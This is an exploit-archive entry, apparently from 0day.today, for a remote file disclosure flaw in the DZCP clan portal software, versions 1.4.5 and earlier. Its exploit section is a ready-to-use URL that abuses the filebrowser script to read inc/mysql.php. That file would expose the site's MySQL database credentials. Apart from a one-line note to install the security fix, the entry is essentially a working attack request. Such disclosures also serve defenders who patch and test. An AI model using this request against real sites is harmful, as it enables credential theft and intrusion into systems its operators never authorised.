id: 1532
date: 02/21/2007
title: deV!Lz Clanportal [DZCP] <= 1.4.5 Remote File Disclosure Vulnerability
author: Kiba
cves: 

======================================================================
deV!Lz Clanportal [DZCP] <= 1.4.5 Remote File Disclosure Vulnerability
======================================================================



# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:

http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php

Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php



#  0day.today [2023-03-24]  #